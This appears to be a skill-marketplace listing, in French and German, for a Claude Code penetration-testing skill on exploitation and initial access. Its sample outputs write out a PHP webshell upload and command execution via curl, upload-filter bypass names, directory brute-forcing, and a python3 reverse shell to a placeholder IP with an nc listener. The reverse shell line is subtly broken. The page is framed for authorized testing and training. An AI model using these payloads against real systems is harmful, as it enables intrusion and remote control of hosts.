Compétences exploitation-knowledge
🎯

exploitation-knowledge

Sûr 🌐 Accès réseau⚙️ Commandes externes📁 Accès au système de fichiers

Anwenden von Exploitationstechniken für Penetrationstests

Dieser Skill bietet strukturierte Anleitung für Schwachstellenausnutzung und initialen Zugriff während autorisierter Penetrationstests. Er umfasst Exploit-Suche, Anpassung, Shell-Etablierung und User-Flag-Erfassung unter Verwendung branchenüblicher Tools und Methoden.

Prend en charge: Claude Code(CC)
📊 69 Adéquat
1

Télécharger le ZIP du skill

2

Importer dans Claude

Allez dans Paramètres → Capacités → Skills → Importer un skill

3

Activez et commencez à utiliser

Tester

Utilisation de "exploitation-knowledge". Ich habe einen PHP-File-Upload-Endpunkt gefunden. Hilf mir, ihn für RCE auszunutzen.

Résultat attendu:

  • Upload a PHP webshell using curl: curl -F 'file=@shell.php' http://target/upload.php
  • Try extension bypass: shell.php5, shell.phtml, shell.php.jpg
  • Brute-force the uploads directory: gobuster dir -u http://target/uploads -x php
  • Execute commands via: curl http://target/uploads/shell.php?cmd=id
  • If filtering blocks characters, use base64 encoding for the payload

Utilisation de "exploitation-knowledge". Ich muss eine Reverse Shell etablieren, aber das Ziel hat nur python3 verfügbar.

Résultat attendu:

  • Use python3 reverse shell: python3 -c 'import socket,subprocess,os;s=s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
  • Start your listener first: nc -lvnp 4444
  • If the target has python but not python3, use: python -c '...same syntax...'

Audit de sécurité

Sûr
v5 • 1/16/2026

This is a pure documentation/methodology knowledge base for penetration testing education. The static scanner flagged 154 patterns found in documentation examples (tool references, command syntax, IP addresses) but failed to recognize the educational context. All findings are FALSE POSITIVES - this skill contains only written guidance about exploitation techniques, no executable code, no network operations, and no file system access. Content is consistent with authorized security research and industry-standard pentesting methodology used by security professionals on platforms like HackTheBox.

2
Fichiers analysés
701
Lignes analysées
3
résultats
5
Total des audits

Facteurs de risque

🌐 Accès réseau (28)
skill-report.json:6 skill-report.json:123 skill-report.json:125 skill-report.json:126 SKILL.md:63 SKILL.md:172 SKILL.md:178 SKILL.md:181 SKILL.md:188 SKILL.md:191 SKILL.md:194 SKILL.md:201 SKILL.md:202 SKILL.md:203 SKILL.md:206 SKILL.md:216 SKILL.md:219 SKILL.md:310 SKILL.md:314 SKILL.md:318 SKILL.md:377 SKILL.md:380 SKILL.md:383 SKILL.md:100 SKILL.md:107 SKILL.md:201 SKILL.md:202 SKILL.md:203
⚙️ Commandes externes (76)
SKILL.md:160 SKILL.md:116 SKILL.md:160 SKILL.md:22 SKILL.md:23 SKILL.md:29 SKILL.md:32 SKILL.md:33 SKILL.md:38 SKILL.md:39 SKILL.md:39 SKILL.md:39 SKILL.md:49-72 SKILL.md:72-78 SKILL.md:78-93 SKILL.md:93-102 SKILL.md:102-105 SKILL.md:105-108 SKILL.md:108-111 SKILL.md:111-125 SKILL.md:125-131 SKILL.md:131-137 SKILL.md:137-143 SKILL.md:143-152 SKILL.md:152-158 SKILL.md:158-164 SKILL.md:164-170 SKILL.md:170-182 SKILL.md:182-186 SKILL.md:186-195 SKILL.md:195-199 SKILL.md:199-203 SKILL.md:203-207 SKILL.md:207-211 SKILL.md:211-223 SKILL.md:223-229 SKILL.md:229-241 SKILL.md:241-250 SKILL.md:250-260 SKILL.md:260-263 SKILL.md:263-278 SKILL.md:278-284 SKILL.md:284-305 SKILL.md:305-308 SKILL.md:308-324 SKILL.md:324-330 SKILL.md:330-357 SKILL.md:357-360 SKILL.md:360-368 SKILL.md:368-375 SKILL.md:375-384 SKILL.md:384-387 SKILL.md:387-400 SKILL.md:400-407 SKILL.md:407-416 SKILL.md:416-419 SKILL.md:419-425 SKILL.md:425-428 SKILL.md:428-432 SKILL.md:432-439 SKILL.md:439-444 SKILL.md:444-463 SKILL.md:463-483 SKILL.md:483-489 SKILL.md:489-499 SKILL.md:499-514 SKILL.md:514 SKILL.md:119 SKILL.md:430 SKILL.md:428-432 SKILL.md:101 SKILL.md:116 SKILL.md:122 SKILL.md:124 SKILL.md:160 SKILL.md:399
📁 Accès au système de fichiers (11)
SKILL.md:409 SKILL.md:410 SKILL.md:411 SKILL.md:272 SKILL.md:124 SKILL.md:124 SKILL.md:124 SKILL.md:124 SKILL.md:398 SKILL.md:399 SKILL.md:399
Audité par: claude Voir l’historique des audits →

Score de qualité

38
Architecture
100
Maintenabilité
87
Contenu
21
Communauté
100
Sécurité
87
Conformité aux spécifications

Ce que vous pouvez construire

Üben an verwundbaren Zielen

Anwenden strukturierter Exploitationsmethodik beim Testen von HackTheBox- oder VulnHub-Maschinen zur Kompetenzentwicklung

Durchführen der Initial-Access-Phase

Befolgen konsistenter Verfahren zum Erlangen von Befehlsausführung während autorisierter Penetrationstest-Engagements

Erlernen von Exploitationstechniken

Studieren dokumentierter Methoden für Reverse Shells, Web-Exploits und Privilege-Escalation-Vektoren

Essayez ces prompts

Einen spezifischen Dienst exploiten 
I discovered that port 80 is running Apache Struts 2.3. Help me find and adapt an exploit to gain initial access.
Reverse Shell etablieren 
I have RCE on the target but nc is not available. What reverse shell options work with python3?
Web-Schwachstelle testen 
The target has an upload form at /upload.php. How do I test for RCE and what bypass techniques should I try?
Exploit-Fehler diagnostizieren 
My exploit ran but no shell appeared. The listener is running on port 4444. How do I diagnose what went wrong?

Bonnes pratiques

  • Immer einen Listener einrichten, bevor Exploits ausgelöst werden, um Reverse Shells abzufangen
  • Exploit-Code lesen und verstehen, bevor er in der eigenen Umgebung ausgeführt wird
  • Fehler systematisch diagnostizieren, anstatt denselben Ansatz wiederholt zu versuchen

Éviter

  • Exploits ausführen, ohne vorher zu verstehen, was sie tun
  • Sich auf eine einzelne Exploit-Quelle verlassen, anstatt mehrere Quellen zu durchsuchen
  • Annehmen, dass derselbe Exploit ohne Umgebungsanpassung funktioniert

Foire aux questions

Welche KI-Tools unterstützen diesen Skill?
Dieser Skill funktioniert mit Claude und Claude Code für strukturierte Penetrationstest-Anleitung.
Was sind die Grenzen dieser Wissensbasis?
Er bietet methodische Anleitung, führt jedoch kein automatisiertes Scanning oder Exploitation durch.
Kann ich dies mit anderen Tools integrieren?
Ja, kombinieren Sie ihn mit Reconnaissance-Skills für einen vollständigen Pentest-Workflow von der Entdeckung bis zur Exploitation.
Sind meine Daten bei Verwendung dieses Skills sicher?
Dies ist ein Prompt-basierter Skill ohne Code-Ausführung oder Datenerfassung. Alle Verarbeitung erfolgt lokal.
Warum ist mein Exploit ohne Antwort fehlgeschlagen?
Häufige Ursachen sind Firewall-Blockierung, falsches Ziel oder fehlende Abhängigkeiten. Verwenden Sie das Diagnose-Framework im Skill.
Wie unterscheidet sich dies von Metasploit?
Dieser Skill leitet manuelle Exploitationstechniken an, während Metasploit ein automatisiertes Framework ist. Beide können zusammen verwendet werden.

Détails du développeur

Licence

MIT

Dépôt

https://github.com/CharlesKozel/Pentest-Agent-Evalulator/tree/main/agents/claude-tbug/skills/exploitation

Réf

main

Structure de fichiers

📄 SKILL.md